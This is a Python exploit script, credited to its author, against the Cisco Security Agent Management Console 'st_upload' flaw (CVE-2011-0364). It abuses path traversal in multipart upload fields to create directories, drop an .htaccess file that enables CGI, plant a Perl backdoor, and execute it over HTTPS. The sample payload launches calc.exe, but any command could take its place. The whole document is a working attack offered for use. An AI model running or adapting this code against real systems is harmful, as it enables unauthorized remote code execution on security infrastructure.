#!/usr/bin/env python
# Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)
# gerry eisenhaur <gerry.eisenhaur _at_ gmail.com>
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
# we need to enable some scripting to get command access
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
backdoor = "exec \"calc.exe\";"
def send_request(params=None):
buf = StringIO.StringIO()
headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}
for(key, value) in params.iteritems():
buf.write('--%s\r\n' % _boundary)
buf.write('Content-Disposition: form-data; name="%s"' % key)
buf.write('\r\n\r\n%s\r\n' % value)
buf.write('--' + _boundary + '--\r\n\r\n')
body = buf.getvalue()
conn = httplib.HTTPSConnection(_csamc)
conn.request("POST", "/csamc60/agent", body, headers)
response = conn.getresponse()
print response.status, response.reason
conn.close()
def main():
### Build up required dir tree
dirtree = ["../bin/webserver/htdocs/diag/bin",
"../bin/webserver/htdocs/diag/bin/webserver",
"../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
_params = {
'host_uid': _host_uid,
'jobname': None,
'host': "aa",
'diags': " ",
'diagsu': " ",
'profiler': " ",
'extension': "gee",
}
for path in dirtree:
print "[+] Creating directory: %s" % path
_params['jobname'] = path
send_request(_params)
### Done building path, drop files
print "[+] Dropping .htaccess"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/",
'diags': "",
'diagsu': "",
'profiler': htaccess,
'extension': "/../.htaccess",
})
print "[+] Dropping payload"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/htdocs/gerry",
'diags': perl_path,
'diagsu': "",
'profiler': backdoor,
'extension': "/../exploit.gee",
})
print "[+] Done, Executing dropped file."
try:
conn = httplib.HTTPSConnection(_csamc, timeout=1)
conn.request("GET", "/csamc60/exploit.gee")
response = conn.getresponse()
print response.status, response.reason
print response.read()
except httplib.ssl.SSLError:
pass
print "[+] Finished."
if __name__ == '__main__':
main()